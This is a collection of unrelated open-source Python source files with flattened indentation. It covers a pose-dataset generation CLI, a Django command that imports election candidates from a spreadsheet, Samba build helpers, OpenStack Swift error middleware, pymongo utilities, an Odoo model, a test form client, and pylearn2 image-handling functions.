elif opt in ('-d','--dataset'):
dataset = arg
if not (dataset in ['mpii', 'flic']):
print "Bad argument for --dataset"
helpmessage()
# Output file
elif opt in ('-o','--outfile'):
outfile = arg
# Prefix
elif opt in ('-p','--prefix'):
datadir = arg
# Set type
elif opt in ('-t','--type'):
settype = arg
if not (settype in ['train','test','valid','train_obs','test_obs']):
print "Bad argument for --type"
helpmessage()
# Number of samples
elif opt in ('-n','--numsamples'):
numsamples = int(arg)
if numsamples < -1:
print "Bad argument for --numsamples"
helpmessage()
# Move
elif opt in ('-m','--move'):
move = int(arg)
if not 0 <= move <= 50:
print "Bad argument for --move"
helpmessage()
else:
if chg is None:
chg = {}
chg['translate'] = move
# Zoom
elif opt in ('-z','--zoom'):
zoom = float(arg)
if not 0 <= zoom <= 1:
print "Bad argument for --zoom"
helpmessage()
else:
if chg is None:
chg = {}
chg['scale'] = zoom
# Rotate
elif opt in ('-r','--rotate'):
rot = int(arg)
if not -1 <= rot <= 180:
print "Bad argument for --rotate"
helpmessage()
else:
if chg is None:
chg = {}
chg['rotate'] = rot
# Segment
elif opt in ('-s','--segment'):
seg = int(arg)
if not (0 <= seg <= 3):
print "Bad argument for --segment"
helpmessage()
# Detect
elif opt in ('-q','--detect'):
sampletype = 'detect'
# Cascade
elif opt in ('-c','--cascade'):
sampletype = 'cascade'
jnt1 = int(arg)
elif opt in ('-j','--pairedjoint'):
jnt2 = int(arg)
if dataset is None:
print "No dataset chosen."
helpmessage()
if outfile is None:
print "No output filename chosen."
helpmessage()
if settype in ['test','test_obs']:
# Test set has a standard number of images, and no augmentation
numsamples = -1
elif settype == 'train' and chg is None:
if sampletype == 'default': chg = {'rotate':20, 'scale':.5}
elif sampletype == 'cascade': chg = {'rotate':20,'scale':.2, 'translate':20}
else: chg = {}
chg['flip'] = True
# If we're generating cascade data make sure two joints have been provided
if sampletype == 'cascade':
if jnt1 == -1 or jnt2 == -1:
print "Need two joints to generate cascade data"
helpmessage()
extra = [jnt1, jnt2]
generateset(dataset, settype, outfile, numsamples, datadir=datadir, chg=chg, sampletype=sampletype, extra_args=extra)
if __name__ == "__main__":
main(sys.argv[1:])
|
import requests
import csv
from io import StringIO
from django.core.management.base import BaseCommand
from django.template.defaultfilters import slugify
from candidates.views.version_data import get_change_metadata
from elections.models import Election
import memcache
UNKNOWN_PARTY_ID = 'unknown'
GOOGLE_DOC_ID = '1yme9Y9Vt876-cVR9bose3QDqF7j8hqLnWYEjO3HUqXs'
def get_existing_popit_person(person_id):
from candidates.models import PopItPerson
from candidates.popit import get_search_url
# See if this person already exists by searching for the
# ID they were imported with:
query_format = \
'identifiers.identifier:"{id}" AND ' + \
'identifiers.scheme:"{scheme}"'
search_url = get_search_url(
'persons',
query_format.format(
id=person_id, scheme='import-id'
),
embed='membership.organization'
)
results = requests.get(search_url).json()
total = results['total']
if total > 1:
message = "Multiple matches for CI ID {0}"
raise Exception(message.format(person_id))
if total == 0:
return None
# Otherwise there was exactly one result:
return PopItPerson.create_from_dict(results['result'][0])
class Command(BaseCommand):
help = "Load or update St. Paul candidates from Google docs"
def handle(self, **options):
from slumber.exceptions import HttpClientError
from candidates.cache import get_post_cached, UnknownPostException
from candidates.election_specific import PARTY_DATA, shorten_post_label
from candidates.models import PopItPerson
from candidates.popit import create_popit_api_object
spreadsheet_url = 'https://docs.google.com/spreadsheets/d/{0}/pub?output=csv'\
.format(GOOGLE_DOC_ID)
candidate_list = requests.get(spreadsheet_url)
content = StringIO(unicode(candidate_list.content))
reader = csv.DictReader(content)
api = create_popit_api_object()
for row in reader:
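# Rows whose Ward maps to a known council post use the council-member
# election; anything else falls back to the school-board election.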
try:
election_data = Election.objects.get_by_slug('council-member-2015')
ocd_division = election_data.post_id_format.format(area_id=row['Ward'])
post_data = get_post_cached(api, ocd_division)['result']
except (UnknownPostException, memcache.Client.MemcachedKeyCharacterError):
election_data = Election.objects.get_by_slug('school-board-2015')
post_data = get_post_cached(api, election_data.post_id_format)['result']
person_id = slugify(row['Name'])
person = get_existing_popit_person(person_id)
if person:
print("Found an existing person:", row['Name'])
else:
print("No existing person, creating a new one:", row['Name'])
person = PopItPerson()
person.name = row['Name']
# TODO: Get these attributes in the spreadsheet
# person.gender = gender
# if birth_date:
# person.birth_date = str(birth_date)
# else:
# person.birth_date = None
person.email = row['Campaign Email']
person.facebook_personal_url = row["Candidate's Personal Facebook Profile"]
person.facebook_page_url = row['Campaign Facebook Page']
person.twitter_username = row['Campaign Twitter']\
.replace('N/A', '')\
.replace('N', '')\
.replace('http://twitter.com/', '')\
.replace('https://twitter.com/', '')
person.linkedin_url = row['LinkedIn']
person.homepage_url = row['Campaign Website\n']
standing_in_election = {
'post_id': post_data['id'],
'name': shorten_post_label(post_data['label']),
}
if 'area' in post_data:
standing_in_election['mapit_url'] = post_data['area']['identifier']
person.standing_in = {
election_data.slug: standing_in_election
}
if 'dfl' in row['Party'].lower():
party_id = 'party:101'
elif 'green' in row['Party'].lower():
party_id = 'party:201'
elif 'independence' in row['Party'].lower():
party_id = 'party:301'
else:
party_id = 'party:401'
party_name = PARTY_DATA.party_id_to_name[party_id]
person.party_memberships = {
election_data.slug: {
'id': party_id,
'name': party_name,
}
}
person.set_identifier('import-id', person_id)
change_metadata = get_change_metadata(
None,
'Imported candidate from Google Spreadsheet',
)
person.record_version(change_metadata)
try:
person.save_to_popit(api)
# TODO: Get candidate Images
# if image_url:
# enqueue_image(person, user, image_url)
except HttpClientError as hce:
print "Got an HttpClientError:", hce.content
raise
|
# waf build tool for building IDL files with pidl
import Build
from samba_utils import *
from samba_autoconf import *
from Configure import conf
@conf
def SAMBA_CHECK_PYTHON(conf, mandatory=True, version=(2,4,2)):
# enable tool to build python extensions
conf.find_program('python', var='PYTHON', mandatory=mandatory)
conf.check_tool('python')
path_python = conf.find_program('python')
conf.env.PYTHON_SPECIFIED = (conf.env.PYTHON != path_python)
conf.check_python_version(version)
@conf
def SAMBA_CHECK_PYTHON_HEADERS(conf, mandatory=True):
if conf.env["python_headers_checked"] == []:
conf.check_python_headers(mandatory)
conf.env["python_headers_checked"] = "yes"
else:
conf.msg("python headers", "using cache")
def SAMBA_PYTHON(bld, name,
source='',
deps='',
public_deps='',
realname=None,
cflags='',
includes='',
init_function_sentinel=None,
local_include=True,
vars=None,
enabled=True):
'''build a python extension for Samba'''
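# Illustrative call from a wscript (target and dependency names below are
# hypothetical):
#   bld.SAMBA_PYTHON('python_foo', source='pyfoo.c', deps='talloc',
#                    realname='samba/foo.so')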
# when we support static python modules we'll need to gather
# the list from all the SAMBA_PYTHON() targets
if init_function_sentinel is not None:
cflags += '-DSTATIC_LIBPYTHON_MODULES=%s' % init_function_sentinel
source = bld.EXPAND_VARIABLES(source, vars=vars)
if realname is not None:
link_name = 'python_modules/%s' % realname
else:
link_name = None
bld.SAMBA_LIBRARY(name,
source=source,
deps=deps,
public_deps=public_deps,
includes=includes,
cflags=cflags,
local_include=local_include,
vars=vars,
realname=realname,
link_name=link_name,
pyext=True,
target_type='PYTHON',
install_path='${PYTHONARCHDIR}',
allow_undefined_symbols=True,
enabled=enabled)
Build.BuildContext.SAMBA_PYTHON = SAMBA_PYTHON
|
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from swift import gettext_ as _
from swift.common.swob import Request, HTTPServerError
from swift.common.utils import get_logger, generate_trans_id
from swift.common.wsgi import WSGIContext
class CatchErrorsContext(WSGIContext):
def __init__(self, app, logger, trans_id_suffix=''):
super(CatchErrorsContext, self).__init__(app)
self.logger = logger
self.trans_id_suffix = trans_id_suffix
def handle_request(self, env, start_response):
trans_id = generate_trans_id(self.trans_id_suffix)
env['swift.trans_id'] = trans_id
self.logger.txn_id = trans_id
try:
# catch any errors in the pipeline
resp = self._app_call(env)
except: # noqa
self.logger.exception(_('Error: An error occurred'))
resp = HTTPServerError(request=Request(env),
body='An error occurred',
content_type='text/plain')
resp.headers['X-Trans-Id'] = trans_id
return resp(env, start_response)
# make sure the response has the trans_id
if self._response_headers is None:
self._response_headers = []
self._response_headers.append(('X-Trans-Id', trans_id))
start_response(self._response_status, self._response_headers,
self._response_exc_info)
return resp
class CatchErrorMiddleware(object):
"""
Middleware that provides high-level error handling and ensures that a
transaction id will be set for every request.
"""
def __init__(self, app, conf):
self.app = app
self.logger = get_logger(conf, log_route='catch-errors')
self.trans_id_suffix = conf.get('trans_id_suffix', '')
def __call__(self, env, start_response):
"""
If used, this should be the first middleware in pipeline.
"""
context = CatchErrorsContext(self.app,
self.logger,
self.trans_id_suffix)
return context.handle_request(env, start_response)
def filter_factory(global_conf, **local_conf):
conf = global_conf.copy()
conf.update(local_conf)
def except_filter(app):
return CatchErrorMiddleware(app, conf)
return except_filter
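# Hedged configuration sketch: catch_errors is normally the first filter in a
# Swift proxy pipeline. A typical proxy-server.conf fragment (the surrounding
# pipeline members and the suffix value are illustrative):
#
#   [pipeline:main]
#   pipeline = catch_errors proxy-logging cache proxy-server
#
#   [filter:catch_errors]
#   use = egg:swift#catch_errors
#   trans_id_suffix = -mycluster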
|
# Copyright 2009-2012 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Bits and pieces used by the driver that don't really fit elsewhere."""
try:
import hashlib
_md5func = hashlib.md5
except ImportError:  # for Python < 2.5
import md5
_md5func = md5.new
import random
import struct
import bson
import pymongo
from bson.binary import OLD_UUID_SUBTYPE
from bson.son import SON
from pymongo.errors import (AutoReconnect,
OperationFailure,
TimeoutError)
def _index_list(key_or_list, direction=None):
"""Helper to generate a list of (key, direction) pairs.
Takes such a list, or a single key, or a single key and direction.
"""
if direction is not None:
return [(key_or_list, direction)]
else:
if isinstance(key_or_list, basestring):
return [(key_or_list, pymongo.ASCENDING)]
elif not isinstance(key_or_list, list):
raise TypeError("if no direction is specified, "
"key_or_list must be an instance of list")
return key_or_list
def _index_document(index_list):
"""Helper to generate an index specifying document.
Takes a list of (key, direction) pairs.
"""
if isinstance(index_list, dict):
raise TypeError("passing a dict to sort/create_index/hint is not "
"allowed - use a list of tuples instead. did you "
"mean %r?" % list(index_list.iteritems()))
elif not isinstance(index_list, list):
raise TypeError("must use a list of (key, direction) pairs, "
"not: " + repr(index_list))
if not len(index_list):
raise ValueError("key_or_list must not be the empty list")
index = SON()
for (key, value) in index_list:
if not isinstance(key, basestring):
raise TypeError("first item in each key pair must be a string")
if value not in [pymongo.ASCENDING, pymongo.DESCENDING, pymongo.GEO2D, pymongo.GEOHAYSTACK]:
raise TypeError("second item in each key pair must be ASCENDING, "
"DESCENDING, GEO2D, or GEOHAYSTACK")
index[key] = value
return index
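# Hedged usage sketch of the helpers above (illustrative only, not part of
# the driver API):
def _example_index_spec():
    # A bare key defaults to ascending order.
    assert _index_list("a") == [("a", pymongo.ASCENDING)]
    # A (key, direction) list becomes an ordered SON document; key order is
    # preserved because compound index definitions are order-sensitive.
    spec = _index_document([("a", pymongo.ASCENDING),
                            ("b", pymongo.DESCENDING)])
    assert spec.keys() == ["a", "b"]
    assert (spec["a"], spec["b"]) == (1, -1)
    return spec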
def _unpack_response(response, cursor_id=None,
as_class=dict, tz_aware=False, uuid_subtype=OLD_UUID_SUBTYPE):
"""Unpack a response from the database.
Check the response for errors and unpack, returning a dictionary
containing the response data.
:Parameters:
- `response`: byte string as returned from the database
- `cursor_id` (optional): cursor_id we sent to get this response -
used for raising an informative exception when we get cursor id not
valid at server response
- `as_class` (optional): class to use for resulting documents
"""
response_flag = struct.unpack("<i", response[:4])[0]
if response_flag & 1:
# Shouldn't get this response if we aren't doing a getMore
assert cursor_id is not None
raise OperationFailure("cursor id '%s' not valid at server" %
cursor_id)
elif response_flag & 2:
error_object = bson.BSON(response[20:]).decode()
if error_object["$err"].startswith("not master"):
raise AutoReconnect("master has changed")
raise OperationFailure("database error: %s" %
error_object["$err"])
result = {}
result["cursor_id"] = struct.unpack("<q", response[4:12])[0]
result["starting_from"] = struct.unpack("<i", response[12:16])[0]
result["number_returned"] = struct.unpack("<i", response[16:20])[0]
result["data"] = bson.decode_all(response[20:],
as_class, tz_aware, uuid_subtype)
assert len(result["data"]) == result["number_returned"]
return result
def _check_command_response(response, reset, msg="%s", allowable_errors=[]):
if not response["ok"]:
if "wtimeout" in response and response["wtimeout"]:
raise TimeoutError(msg % response["errmsg"])
details = response
# Mongos returns the error details in a 'raw' object
# for some errors.
if "raw" in response:
for shard in response["raw"].itervalues():
if not shard.get("ok"):
# Just grab the first error...
details = shard
break
if not details["errmsg"] in allowable_errors:
if details["errmsg"] == "not master":
if reset is not None:
reset()
raise AutoReconnect("not master")
if details["errmsg"] == "db assertion failure":
ex_msg = ("db assertion failure, assertion: '%s'" %
details.get("assertion", ""))
if "assertionCode" in details:
ex_msg += (", assertionCode: %d" %
(details["assertionCode"],))
raise OperationFailure(ex_msg, details.get("assertionCode"))
raise OperationFailure(msg % details["errmsg"])
def _password_digest(username, password):
"""Get a password digest to use for authentication.
"""
if not isinstance(password, basestring):
raise TypeError("password must be an instance "
"of %s" % (basestring.__name__,))
if not isinstance(username, basestring):
raise TypeError("username must be an instance "
"of %s" % (basestring.__name__,))
md5hash = _md5func()
data = "%s:mongo:%s" % (username, password)
md5hash.update(data.encode('utf-8'))
return unicode(md5hash.hexdigest())
def _auth_key(nonce, username, password):
"""Get an auth key to use for authentication.
"""
digest = _password_digest(username, password)
md5hash = _md5func()
data = "%s%s%s" % (nonce, unicode(username), digest)
md5hash.update(data.encode('utf-8'))
return unicode(md5hash.hexdigest())
def _fields_list_to_dict(fields):
"""Takes a list of field names and returns a matching dictionary.
["a", "b"] becomes {"a": 1, "b": 1}
and
["a.b.c", "d", "a.c"] becomes {"a.b.c": 1, "d": 1, "a.c": 1}
"""
as_dict = {}
for field in fields:
if not isinstance(field, basestring):
raise TypeError("fields must be a list of key names, "
"each an instance of %s" % (basestring.__name__,))
as_dict[field] = 1
return as_dict
def shuffled(sequence):
"""Returns a copy of the sequence (as a :class:`list`) which has been
shuffled by :func:`random.shuffle`.
"""
out = list(sequence)
random.shuffle(out)
return out
|
# -*- coding: utf-8 -*-
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import api, fields, models
class ExternalSyncBatchMember(models.Model):
_description = 'External Sync Batch Member'
_name = 'clv.external_sync.batch.member'
_order = "sequence"
external_sync_batch_id = fields.Many2one(
comodel_name='clv.external_sync.batch',
string='External Sync Batch ',
required=False
)
notes = fields.Text(string='Notes')
sequence = fields.Integer(
string='Sequence',
default=10
)
class ExternalSyncBatch(models.Model):
_inherit = 'clv.external_sync.batch'
external_sync_batch_member_ids = fields.One2many(
comodel_name='clv.external_sync.batch.member',
inverse_name='external_sync_batch_id',
string='Members',
readonly=False
)
count_external_sync_batch_members = fields.Integer(
string='Number of Members',
compute='_compute_count_external_sync_batch_members',
store=False
)
@api.depends('external_sync_batch_member_ids')
def _compute_count_external_sync_batch_members(self):
for r in self:
r.count_external_sync_batch_members = len(r.external_sync_batch_member_ids)
|
# -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2018 CERN.
#
# INSPIRE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE. If not, see <http://www.gnu.org/licenses/>.
#
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
"""Literature suggestion form testlib."""
from __future__ import absolute_import, division, print_function
class AuthorFormInputData(object):
def __init__(
self,
given_names,
research_field,
status='active',
family_name=None,
display_name=None
):
self.given_names = given_names
self.family_name = family_name
self.display_name = display_name
self.status = status
self.research_field = research_field
def request_data(self):
formdata = {
'given_names': self.given_names,
'family_name': self.family_name,
'display_name': self.display_name,
'status': self.status,
'research_field': self.research_field,
}
return formdata
class AuthorFormApiClient(object):
SUBMIT_AUTHOR_FORM_URL = '/authors/new/submit'
def __init__(self, client):
self._client = client
def submit(self, form_input_data):
response = self._client.post(
self.SUBMIT_AUTHOR_FORM_URL,
data=form_input_data.request_data()
)
response.raise_for_status()
return response
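# Hedged usage sketch: how the two helpers above are typically combined in a
# test. `client` stands for a test client fixture; the field values are made up.
def _example_submit_author(client):
    form_data = AuthorFormInputData(
        given_names='Jane',
        family_name='Doe',
        research_field='hep-ex',
    )
    return AuthorFormApiClient(client).submit(form_data)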
|
"""
.. todo::
WRITEME
"""
import logging
import numpy as np
plt = None
axes = None
from theano.compat.six.moves import xrange
import warnings
try:
import matplotlib.pyplot as plt
import matplotlib.axes
except (RuntimeError, ImportError) as matplotlib_exception:
warnings.warn("Unable to import matplotlib. Some features unavailable. "
"Original exception: " + str(matplotlib_exception))
import os
try:
from PIL import Image
except ImportError:
Image = None
from pylearn2.utils import string_utils as string
from pylearn2.utils.exc import reraise_as
from tempfile import mkstemp
from multiprocessing import Process
import subprocess
logger = logging.getLogger(__name__)
def ensure_Image():
"""Makes sure Image has been imported from PIL"""
global Image
if Image is None:
raise RuntimeError("You are trying to use PIL-dependent functionality"
" but don't have PIL installed.")
def imview(*args, **kwargs):
"""
A more sensible matplotlib-based image viewer command,
a wrapper around `matplotlib.pyplot.imshow`.
Parameters are identical to `matplotlib.pyplot.imshow`
but this behaves somewhat differently:
    * By default, it creates a new figure (unless a
      `figure` keyword argument is supplied).
* It modifies the axes of that figure to use the
full frame, without ticks or tick labels.
* It turns on `nearest` interpolation by default
(i.e., it does not antialias pixel data). This
can be overridden with the `interpolation`
argument as in `imshow`.
    All other arguments and keyword arguments are passed
    on to `imshow`.
"""
if 'figure' not in kwargs:
f = plt.figure()
else:
f = kwargs['figure']
new_ax = matplotlib.axes.Axes(f,
[0, 0, 1, 1],
xticks=[],
yticks=[],
frame_on=False)
f.delaxes(f.gca())
f.add_axes(new_ax)
if len(args) < 5 and 'interpolation' not in kwargs:
kwargs['interpolation'] = 'nearest'
plt.imshow(*args, **kwargs)
def imview_async(*args, **kwargs):
"""
A version of `imview` that forks a separate process and
immediately shows the image.
Supports the `window_title` keyword argument to cope with
the title always being 'Figure 1'.
Returns the `multiprocessing.Process` handle.
"""
if 'figure' in kwargs:
raise ValueError("passing a figure argument not supported")
def fork_image_viewer():
f = plt.figure()
kwargs['figure'] = f
imview(*args, **kwargs)
if 'window_title' in kwargs:
f.set_window_title(kwargs['window_title'])
plt.show()
p = Process(None, fork_image_viewer)
p.start()
return p
def show(image):
"""
.. todo::
WRITEME
Parameters
----------
image : PIL Image object or ndarray
If ndarray, integer formats are assumed to use 0-255
and float formats are assumed to use 0-1
"""
viewer_command = string.preprocess('${PYLEARN2_VIEWER_COMMAND}')
if viewer_command == 'inline':
return imview(image)
if hasattr(image, '__array__'):
#do some shape checking because PIL just raises a tuple indexing error
#that doesn't make it very clear what the problem is
if len(image.shape) < 2 or len(image.shape) > 3:
raise ValueError('image must have either 2 or 3 dimensions but its'
' shape is ' + str(image.shape))
if image.dtype == 'int8':
image = np.cast['uint8'](image)
elif str(image.dtype).startswith('float'):
#don't use *=, we don't want to modify the input array
image = image * 255.
image = np.cast['uint8'](image)
#PIL is too stupid to handle single-channel arrays
if len(image.shape) == 3 and image.shape[2] == 1:
image = image[:,:,0]
try:
ensure_Image()
image = Image.fromarray(image)
except TypeError:
reraise_as(TypeError("PIL issued TypeError on ndarray of shape " +
str(image.shape) + " and dtype " +
str(image.dtype)))
# Create a temporary file with the suffix '.png'.
fd, name = mkstemp(suffix='.png')
os.close(fd)
# Note:
# Although we can use tempfile.NamedTemporaryFile() to create
# a temporary file, the function should be used with care.
#
# In Python earlier than 2.7, a temporary file created by the
# function will be deleted just after the file is closed.
# We can re-use the name of the temporary file, but there is an
# instant where a file with the name does not exist in the file
# system before we re-use the name. This may cause a race
# condition.
#
# In Python 2.7 or later, tempfile.NamedTemporaryFile() has
# the 'delete' argument which can control whether a temporary
# file will be automatically deleted or not. With the argument,
# the above race condition can be avoided.
#
image.save(name)
if os.name == 'nt':
subprocess.Popen(viewer_command + ' ' + name +' && del ' + name,
shell=True)
else:
subprocess.Popen(viewer_command + ' ' + name +' ; rm ' + name,
shell=True)
def pil_from_ndarray(ndarray):
"""
.. todo::
WRITEME
"""
try:
if ndarray.dtype == 'float32' or ndarray.dtype == 'float64':
assert ndarray.min() >= 0.0
assert ndarray.max() <= 1.0
ndarray = np.cast['uint8'](ndarray * 255)
if len(ndarray.shape) == 3 and ndarray.shape[2] == 1:
ndarray = ndarray[:, :, 0]
ensure_Image()
rval = Image.fromarray(ndarray)
return rval
except Exception as e:
logger.exception('original exception: ')
logger.exception(e)
logger.exception('ndarray.dtype: {0}'.format(ndarray.dtype))
logger.exception('ndarray.shape: {0}'.format(ndarray.shape))
raise
assert False
def ndarray_from_pil(pil, dtype='uint8'):
"""
.. todo::
WRITEME
"""
rval = np.asarray(pil)
if dtype != rval.dtype:
rval = np.cast[dtype](rval)
if str(dtype).startswith('float'):
rval /= 255.
if len(rval.shape) == 2:
rval = rval.reshape(rval.shape[0], rval.shape[1], 1)
return rval
def rescale(image, shape):
"""
Scales image to be no larger than shape. PIL might give you
unexpected results beyond that.
Parameters
----------
image : WRITEME
shape : WRITEME
Returns
-------
WRITEME
"""
assert len(image.shape) == 3 # rows, cols, channels
assert len(shape) == 2 # rows, cols
i = pil_from_ndarray(image)
ensure_Image()
i.thumbnail([shape[1], shape[0]], Image.ANTIALIAS)
rval = ndarray_from_pil(i, dtype=image.dtype)
return rval
resize = rescale
def fit_inside(image, shape):
"""
Scales image down to fit inside shape preserves proportions of image
Parameters
----------
image : WRITEME
shape : WRITEME
Returns
-------
WRITEME
"""
assert len(image.shape) == 3 # rows, cols, channels
assert len(shape) == 2 # rows, cols
if image.shape[0] <= shape[0] and image.shape[1] <= shape[1]:
return image.copy()
row_ratio = float(image.shape[0]) / float(shape[0])
col_ratio = float(image.shape[1]) / float(shape[1])
if row_ratio > col_ratio:
target_shape = [shape[0], min(image.shape[1] / row_ratio, shape[1])]
else:
target_shape = [min(image.shape[0] / col_ratio, shape[0]), shape[1]]
assert target_shape[0] <= shape[0]
assert target_shape[1] <= shape[1]
assert target_shape[0] == shape[0] or target_shape[1] == shape[1]
rval = rescale(image, target_shape)
return rval
def letterbox(image, shape):
"""
Pads image with black letterboxing to bring image.shape up to shape
Parameters
----------
image : WRITEME
shape : WRITEME
Returns
-------
WRITEME
"""
assert len(image.shape) == 3 # rows, cols, channels
assert len(shape) == 2 # rows, cols
assert image.shape[0] <= shape[0]
assert image.shape[1] <= shape[1]
if image.shape[0] == shape[0] and image.shape[1] == shape[1]:
return image.copy()
rval = np.zeros((shape[0], shape[1], image.shape[2]), dtype=image.dtype)
rstart = (shape[0] - image.shape[0]) / 2
cstart = (shape[1] - image.shape[1]) / 2
rend = rstart + image.shape[0]
cend = cstart + image.shape[1]
rval[rstart:rend, cstart:cend] = image
return rval
def make_letterboxed_thumbnail(image, shape):
"""
Scales image down to shape. Preserves proportions of image, introduces
black letterboxing if necessary.
Parameters
----------
image : WRITEME
shape : WRITEME
Returns
-------
WRITEME
"""
assert len(image.shape) == 3
assert len(shape) == 2
shrunk = fit_inside(image, shape)
letterboxed = letterbox(shrunk, shape)
return letterboxed
def load(filepath, rescale_image=True, dtype='float64'):
"""
.. todo::
WRITEME
"""
assert type(filepath) == str
if rescale_image == False and dtype == 'uint8':
ensure_Image()
rval = np.asarray(Image.open(filepath))
# print 'image.load: ' + str((rval.min(), rval.max()))
assert rval.dtype == 'uint8'
return rval
s = 1.0
if rescale_image:
s = 255.
try:
ensure_Image()
rval = Image.open(filepath)
except Exception:
reraise_as(Exception("Could not open " + filepath))
numpy_rval = np.array(rval)
if numpy_rval.ndim not in [2,3]:
logger.error(dir(rval))
logger.error(rval)
logger.error(rval.size)
rval.show()
raise AssertionError("Tried to load an image, got an array with " +
str(numpy_rval.ndim)+" dimensions. Expected 2 or 3."
"This may indicate a mildly corrupted image file. Try "
"converting it to a different image format with a different "
"editor like gimp or imagemagic. Sometimes these programs are "
"more robust to minor corruption than PIL and will emit a "
"correctly formatted image in the new format."
)
rval = numpy_rval
rval = np.cast[dtype](rval) / s
if rval.ndim == 2:
rval = rval.reshape(rval.shape[0], rval.shape[1], 1)
if rval.ndim != 3:
raise AssertionError("Something went wrong opening " +
filepath + '. Resulting shape is ' +
str(rval.shape) +
" (it's meant to have 3 dimensions by now)")
return rval
def save(filepath, ndarray):
"""
.. todo::
WRITEME
"""
pil_from_ndarray(ndarray).save(filepath)
def scale_to_unit_interval(ndar, eps=1e-8):
"""
Scales all values in the ndarray ndar to be between 0 and 1
Parameters
----------
ndar : WRITEME
eps : WRITEME
Returns
-------
WRITEME
"""
ndar = ndar.copy()
ndar -= ndar.min()
ndar *= 1.0 / (ndar.max() + eps)
return ndar
def tile_raster_images(X, img_shape, tile_shape, tile_spacing=(0, 0),
scale_rows_to_unit_interval=True,
output_pixel_vals=True):
"""
Transform an array with one flattened image per row, into an array in
which images are reshaped and layed out like tiles on a floor.
This function is useful for visualizing datasets whose rows are images,
and also columns of matrices for transforming those rows
(such as the first layer of a neural net).
Parameters
----------
    X : numpy.ndarray
2-d ndarray or 4 tuple of 2-d ndarrays or None for channels,
in which every row is a flattened image.
    img_shape : 2-tuple of ints
The first component is the height of each image,
the second component is the width.
tile_shape : 2-tuple of ints
The number of images to tile in (row, columns) form.
scale_rows_to_unit_interval : bool
        Whether or not the values need to be scaled to [0, 1] before being plotted.
output_pixel_vals : bool
Whether or not the output should be pixel values (int8) or floats.
Returns
-------
y : 2d-ndarray
The return value has the same dtype as X, and is suitable for
viewing as an image with PIL.Image.fromarray.
"""
assert len(img_shape) == 2
assert len(tile_shape) == 2
assert len(tile_spacing) == 2
# The expression below can be re-written in a more C style as
# follows :
#
# out_shape = [0,0]
# out_shape[0] = (img_shape[0]+tile_spacing[0])*tile_shape[0] -
# tile_spacing[0]
# out_shape[1] = (img_shape[1]+tile_spacing[1])*tile_shape[1] -
# tile_spacing[1]
out_shape = [(ishp + tsp) * tshp - tsp for ishp, tshp, tsp
in zip(img_shape, tile_shape, tile_spacing)]
if isinstance(X, tuple):
assert len(X) == 4
# Create an output np ndarray to store the image
if output_pixel_vals:
out_array = np.zeros((out_shape[0], out_shape[1], 4),
dtype='uint8')
else:
out_array = np.zeros((out_shape[0], out_shape[1], 4),
dtype=X.dtype)
#colors default to 0, alpha defaults to 1 (opaque)
if output_pixel_vals:
channel_defaults = [0, 0, 0, 255]
else:
channel_defaults = [0., 0., 0., 1.]
for i in xrange(4):
if X[i] is None:
# if channel is None, fill it with zeros of the correct
# dtype
dt = out_array.dtype
if output_pixel_vals:
dt = 'uint8'
out_array[:, :, i] = np.zeros(out_shape, dtype=dt) + \
channel_defaults[i]
else:
# use a recurrent call to compute the channel and store it
# in the output
out_array[:, :, i] = tile_raster_images(
X[i], img_shape, tile_shape, tile_spacing,
scale_rows_to_unit_interval, output_pixel_vals)
return out_array
else:
# if we are dealing with only one channel
H, W = img_shape
Hs, Ws = tile_spacing
# generate a matrix to store the output
dt = X.dtype
if output_pixel_vals:
dt = 'uint8'
out_array = np.zeros(out_shape, dtype=dt)
for tile_row in xrange(tile_shape[0]):
for tile_col in xrange(tile_shape[1]):
if tile_row * tile_shape[1] + tile_col < X.shape[0]:
this_x = X[tile_row * tile_shape[1] + tile_col]
if scale_rows_to_unit_interval:
# if we should scale values to be between 0 and 1
# do this by calling the `scale_to_unit_interval`
# function
this_img = scale_to_unit_interval(
this_x.reshape(img_shape))
else:
this_img = this_x.reshape(img_shape)
# add the slice to the corresponding position in the
# output array
c = 1
if output_pixel_vals:
c = 255
out_array[
tile_row * (H + Hs): tile_row * (H + Hs) + H,
tile_col * (W + Ws): tile_col * (W + Ws) + W
] = this_img * c
return out_array
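# Hedged usage sketch: tiling 100 random 8x8 "images" (one flattened image per
# row) into a 10x10 grid with one pixel of spacing. The shapes are illustrative.
def _example_tile_raster_images():
    X = np.random.rand(100, 64)
    tiles = tile_raster_images(X, img_shape=(8, 8), tile_shape=(10, 10),
                               tile_spacing=(1, 1))
    # Each side is (8 + 1) * 10 - 1 = 89 pixels.
    assert tiles.shape == (89, 89)
    return tiles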
if __name__ == '__main__':
black = np.zeros((50, 50, 3), dtype='uint8')
red = black.copy()
red[:, :, 0] = 255
green = black.copy()
green[:, :, 1] = 255
show(black)
show(green)
show(red)
|
# -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
